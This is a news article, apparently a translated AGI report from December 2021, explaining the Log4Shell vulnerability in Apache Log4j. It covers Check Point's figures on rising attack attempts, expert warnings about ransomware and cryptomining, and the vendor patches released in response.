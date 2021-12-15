AGI – On December 9, the existence of a vulnerability in Log4j was revealed. Log4Shell is baptized. For a couple of days the news remains the fence of cyber security experts and industry sites. Even then, many were alarmed. Yet it will take a long time for the news to land on the main international agencies and the big media. Also because understanding what it is is not easy. Explain it even less.

In the following days it will be understood that Log4j is a library used by the vast majority of software programmers who use the Java language, the most used in the world, the one with which billions of software and applications are written in circulation. A small piece of code hidden in the folds of the programs, but on which the programs themselves are based. And at risk, experts explain, it is not just companies but servers and programs of financial groups, states, national institutions. And everyone agrees that this is one of the most serious vulnerabilities discovered in recent years.

What is Log4j

Log4j is a library distributed free of charge by the Apache Software Foundation. it has been downloaded several million times and has probably been used billions of times. This’ library allows software developers to record user activities and application behavior, in such a way as to be able to subject them to subsequent checks and controls if necessary, and then to hand over to some part of the program itself. These ‘statuses’ are collected and recalled with tags, such as those used to mark blog or Twitter topics.

The vulnerability discovered in December

On December 9, researchers discovered that one of these tags contained a vulnerability that allows attackers to remotely execute code on a target computer. They could then steal data, install malware, take over the entire system. What generally happens when these vulnerabilities are discovered?

Some experts heard by AGI explained that the developer community generally opts to make the vulnerability itself public, or semi-public. An ethical question, but also a practical one: the sooner you know, the sooner you can make sure that everyone finds a solution. But on the other hand it happens that the information also reaches malevolent actors: hackers, thousands of hackers who have since started looking for this vulnerability in the software of institutions, organizations, companies.

840,000 attacks in three days

A photograph of what happened in the following hours was provided today by Check Point, an Israeli cyber security company: on 10 December, a few thousand cyber attack attempts were recorded; on 11 December they became 40,000; on 12 December 200,000; yesterday, 13 December, there were already more than 840,000.

A scary progression. So much so that Lotem Finkelstein, the company’s director of Threat Intelligence and Research, said bluntly: “We can only confirm the seriousness of this threat. Apparently, it is aimed at cryptominers, but we believe that this constitutes the warning. of a hacker attack against a number of high-value targets such as banks, state security and critical infrastructures “.

Furthermore, 40% of companies globally would be victims of attack attempts. 42% in Europe. 43% only in Italy. A complex situation so as to alarm the National Cybersecurity Agency which in recent days spoke of “a vast and diversified attack surface on the entire network”, defining the situation as “particularly serious”.

The internet is in danger

The situation is therefore serious. The Internet remains in danger. And the situation, the experts explain, could remain in the balance for years as it is so complicated to identify and put back in place every time that Log4j has been used.

At the moment there have been attempts of intrusion especially with the purpose of cryptomining, the process of mining cryptocurrencies such as bitcoin. But security experts are particularly concerned that the vulnerability may above all give hackers enough foothold within a system to install ransomware, a type of computer virus that locks down data and systems until it attackers are not paid by the victims.

For larger companies, these redemptions can cost millions of dollars. Attacks can also cause disruptions to services, as happened to Colonial Pipeline’s systems last May, which caused a six-day shutdown of the largest oil pipeline on the east coast of the United States. Or cause damage like the one that hit the health system of the Lazio Region last August, or more recently the attack on Siae. There are thousands of examples.

Millions of servers at risk

“Millions of servers are likely at risk,” said Lou Steinberg, founder of Ctm Insights, a technology incubator. An Apache spokesperson, on the other hand, did not hide that the way in which Log4j is inserted in different pieces of software makes it impossible to trace the scope of the tool. Several tech companies have used it. Many, and the more the hours pass, the more companies discover that they have used it in some way. Among them are Apple, Amazon.com, Cloudflare, IBM, Microsoft-Minecraft, Palo Alto Networks, Twitter, Tesla. But the list could be much longer.

The solutions attempted

Someone is already moving on to counter moves. Apache has released more updates in the past few days and recommended updating to the latest version of the Log4j tool. Oracle released their patches on Friday.

Microsoft has recommended a number of steps to mitigate the risk of the attack, including contacting software application vendors to be sure they are using the latest version of Java, which would include patches. But it is a race against an unknown enemy that continues to attack infrastructure through a piece: a small, often invisible card placed at the base of a pyramid of cards that is in danger of collapsing.